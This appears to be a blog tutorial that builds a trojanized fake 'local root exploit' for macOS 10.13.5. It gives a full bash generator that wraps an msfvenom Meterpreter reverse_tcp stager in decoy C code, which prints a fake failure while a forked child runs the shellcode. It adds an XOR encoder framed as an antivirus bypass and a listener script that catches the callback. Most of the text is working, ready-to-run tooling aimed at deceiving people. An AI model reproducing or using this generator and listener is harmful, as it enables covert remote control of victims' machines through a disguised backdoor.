Another exercise that you might find useful: the art of deception — creating fakes. Fake exploits that exploit the people who run them. Along the way we learn how to fork() :) The defensive lesson is the mirror image of the offensive one: never compile and run a proof-of-concept you have not read, because "the exploit failed" is exactly what a trojanized PoC looks like from the outside.
Our target will be macOS 10.13.5. We will use the Metasploit framework and some custom C code to make the fake exploit look like it is failing, while in fact it spawns a reverse TCP Meterpreter shell :) To be clear: there is no real privilege escalation anywhere in this code — the "local root exploit" banner and the IOConsoleUsers messages are pure cover story. The only thing the program actually does is run a Meterpreter stager in a forked child.
Here is my sample code generator (put this in your metasploit-framework directory, next to msfvenom, and make it executable):
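#!/usr/bin/env bash
# osx64-payload.c generator.
#
# Produces a C file that reads like a macOS 10.13.5 "local root exploit" but
# contains no exploit at all: main() prints a fake progress log, fork()s, the
# parent prints "Exploit failed" and exits, and the orphaned child copies the
# msfvenom osx/x64/meterpreter/reverse_tcp stager into an RWX mapping and
# jumps to it.  All explanatory comments live here, in the generator, on
# purpose: the generated C is meant to be read by the target, so it gets none.
#
# Usage: ./<this script> [LHOST] [LPORT]   (prompts for anything not given)
# Must be run from the metasploit-framework directory (needs ./msfvenom).
set -euo pipefail

readonly OUTFILE=osx64-payload.c
WORKDIR=

die() { printf '%s\n' "$*" >&2; exit 1; }

# EXIT trap: remove the scratch directory holding the raw msfvenom output.
cleanup() {
  if [[ -n "$WORKDIR" ]]; then
    rm -rf -- "$WORKDIR"
  fi
}

# Print $2 if it was given on the command line, otherwise prompt with $1 and
# read one line.  The prompt goes to the terminal, the value to stdout.
prompt_or_arg() {
  local label=$1 given=${2-} answer
  if [[ -n "$given" ]]; then
    printf '%s\n' "$given"
    return 0
  fi
  read -r -p "$label " answer
  printf '%s\n' "$answer"
}

# Only the characters an IP address or hostname can contain; the value is
# handed to msfvenom as LHOST=, so anything else is refused, not interpolated.
valid_host() { [[ "$1" =~ ^[A-Za-z0-9.:_-]+$ ]]; }

# TCP port: digits only, 1..65535.
valid_port() { [[ "$1" =~ ^[0-9]{1,5}$ ]] && (( $1 >= 1 && $1 <= 65535 )); }

# Headers for the decoy, emitted before the msfvenom output.  Quoted heredoc:
# nothing is expanded, so the C comes out exactly as written.
write_headers() {
  cat <<'C_EOF'
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <strings.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
C_EOF
}

# Decoy body, emitted after msfvenom's `unsigned char buf[]` definition.
# random_in_range(), rev() and genlol() are never called: they are filler so
# the file looks like an exploit when skimmed.  The real work is the child
# branch after fork(): mmap an RWX region sized to buf, copy buf, call it.
# stdout is flushed before fork() so the fake log is not printed twice when
# output is a pipe; mmap() failure is reported in-character as "Exploit
# failed" instead of being dereferenced.
write_body() {
  cat <<'C_EOF'
void genlol();
int random_in_range (unsigned int min, unsigned int max);
int random_in_range (unsigned int min, unsigned int max)
{
    int base_random = rand();
    if (RAND_MAX == base_random) {
        return random_in_range(min, max);
    }
    int range = max - min,
        remainder = RAND_MAX % range,
        bucket = RAND_MAX / range;
    if (base_random < RAND_MAX - remainder) {
        return min + base_random/bucket;
    } else {
        return random_in_range (min, max);
    }
}
char* rev(char* str)
{
    int end=strlen(str)-1;
    int i;
    for(i=5; i<end; i++)
    {
        str[i] ^= 1;
    }
    return str;
}
int main(int argc, char **argv)
{
    system ("clear");
    printf ("====================================\n");
    printf ("Local root exploit for MacOS 10.13.5\n");
    printf ("====================================\n");
    printf ("[*] Checking IOConsoleUsers\n");
    system("/bin/sleep 1");
    printf(".");
    fflush(stdout);
    system("/bin/sleep 1");
    printf("..");
    fflush(stdout);
    system("/bin/sleep 1");
    printf("...");
    fflush(stdout);
    system("/bin/sleep 1");
    printf("....");
    printf ("\n[*] Found IOCosoleUsers address gap!\n");
    printf ("\n[*] Spawning root shell\n");
    fflush(stdout);
    pid_t process_id = fork();
    if (process_id < 0)
    {
        printf("fork failed!\n");
        exit(1);
    }
    if (process_id > 0)
    {
        printf("[-] Exploit failed due to invalid PID %d IOConsoleUsers \n", process_id);
        exit(0);
    }
    void *ptr = mmap(0, sizeof buf, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED)
    {
        printf ("\n[-] Exploit failed \n");
        exit(1);
    }
    memcpy(ptr,buf,sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
    printf ("\n[-] Exploit failed \n");
}
void genlol(){
    int num1, num2, num3;
    num1=100;
    while (num1<=5) {
        num1=random_in_range(0,10000);
        num2=random_in_range(0,10000);
        num3=random_in_range(0,10000);
        printf ("\n[*] /bin/bash exec 0 \n");
        printf ("\n[*] R00t3d by 1337 h4x0rz \n");
    }
}
C_EOF
}

main() {
  local lhost lport
  clear
  echo "************************************************************"
  echo " Automatic shellcode generator - FOR METASPLOIT "
  echo " For OSX 64bit Antivirus bypass (Avast) "
  echo " And to get Script Kiddies infected :) "
  echo "************************************************************"
  lhost=$(prompt_or_arg "What IP are we gonna use ?" "${1-}")
  lport=$(prompt_or_arg "What Port Number are we gonna listen to? :" "${2-}")
  valid_host "$lhost" || die "[-] '$lhost' does not look like an IP address or hostname"
  valid_port "$lport" || die "[-] '$lport' is not a TCP port (1-65535)"

  echo '[*] Checking if metasploit msfvenom is present..'
  if [[ -x ./msfvenom ]]; then
    echo '[*] Found msfvenom in current path ........ good'
  else
    die '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
  fi

  echo '[*] Cleaning up '
  rm -f -- "$OUTFILE"
  WORKDIR=$(mktemp -d) || die '[-] mktemp failed'
  trap cleanup EXIT

  # Flags as in the original recipe.  x64/xor only obscures the byte pattern
  # of buf[]; nothing hides the RWX mmap+call from anyone who reads the C.
  ./msfvenom -p osx/x64/meterpreter/reverse_tcp EXITFUNC=process \
    LHOST="$lhost" LPORT="$lport" -a x64 --platform OSX -e x64/xor \
    -f c -o "$WORKDIR/shellcode.c" || die '[-] msfvenom failed'

  # headers, blank line, msfvenom's buf[], blank line, decoy body
  {
    write_headers
    echo ''
    cat -- "$WORKDIR/shellcode.c"
    echo ''
    write_body
  } > "$WORKDIR/payload.c"
  mv -- "$WORKDIR/payload.c" "$OUTFILE"

  if [[ -f "$OUTFILE" ]]; then
    echo "[*] $OUTFILE generated ..."
    ls -la -- "$OUTFILE"
  else
    die '[-] Something went wrong .. '
  fi
}

main "$@"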
This will generate a file called osx64-payload.c with the callback Meterpreter IP and port we chose. Now we can present the code as a super 1337 macOS local root exploit to the script-kiddie audience. Anyone who actually reads C will see through it straight away: the giveaway is msfvenom's `buf[]` byte array being copied into an RWX `mmap` region and called through a function pointer in the forked child — that is what a shellcode loader looks like, not what a kernel exploit looks like ;)
Once the script kiddie compiles the code on their latest macOS 10.13.5 and runs it, the parent process prints the "exploit failed" message and exits, while the forked child executes the stager .. so we get a reverse shell on our listener machine :) (The x64/xor encoder is only there to dodge the signature matching of the AV of the day; treat any AV-bypass claim as time-bound and re-test against current engines before relying on it.)
Our listener script (place it in your metasploit-framework directory, next to msfconsole, and make it executable):
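#!/usr/bin/env bash
# Starts the Metasploit handler that catches the osx64-payload.c callback:
# exploit/multi/handler with PAYLOAD osx/x64/meterpreter/reverse_tcp.
#
# Usage: ./<this script> [LHOST] [LPORT]   (prompts for anything not given)
# Must be run from the metasploit-framework directory (needs ./msfconsole).
# The msfconsole one-liner is also written to ./run.listener.sh so the
# listener can be restarted later without retyping the values.
set -euo pipefail

die() { printf '%s\n' "$*" >&2; exit 1; }

# Print $2 if it was given on the command line, otherwise prompt with $1 and
# read one line.  The prompt goes to the terminal, the value to stdout.
prompt_or_arg() {
  local label=$1 given=${2-} answer
  if [[ -n "$given" ]]; then
    printf '%s\n' "$given"
    return 0
  fi
  read -r -p "$label " answer
  printf '%s\n' "$answer"
}

# Both values are spliced into the msfconsole -x command string and into a
# shell script, so they are restricted to a strict character set first;
# anything else (spaces, quotes, semicolons) is refused, not interpolated.
valid_host() { [[ "$1" =~ ^[A-Za-z0-9.:_-]+$ ]]; }
valid_port() { [[ "$1" =~ ^[0-9]{1,5}$ ]] && (( $1 >= 1 && $1 <= 65535 )); }

main() {
  local lhost lport
  clear
  echo "***************************************************************"
  echo " Meterpreter reverse_tcp listener - FOR METASPLOIT "
  echo " For osx/x64/meterpreter/reverse_tcp callbacks "
  echo "***************************************************************"
  lhost=$(prompt_or_arg "What IP are we gonna listen to ?" "${1-}")
  lport=$(prompt_or_arg "What Port Number are we gonna listen to? :" "${2-}")
  valid_host "$lhost" || die "[-] '$lhost' does not look like an IP address or hostname"
  valid_port "$lport" || die "[-] '$lport' is not a TCP port (1-65535)"
  [[ -x ./msfconsole ]] || die '[-] No msfconsole in current path...make sure you have this script in your metasploit-framework path'

  echo "Starting the meterpreter listener.."
  # Values are already validated above, so plain interpolation is safe here.
  printf '%s\n' '#!/usr/bin/env bash' \
    "./msfconsole -x \"use exploit/multi/handler; set PAYLOAD osx/x64/meterpreter/reverse_tcp; set LHOST $lhost; set LPORT $lport; run\"" \
    > run.listener.sh
  chmod +x run.listener.sh
  ./run.listener.sh
}

main "$@"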
Evil , no ?
Here is the video of the above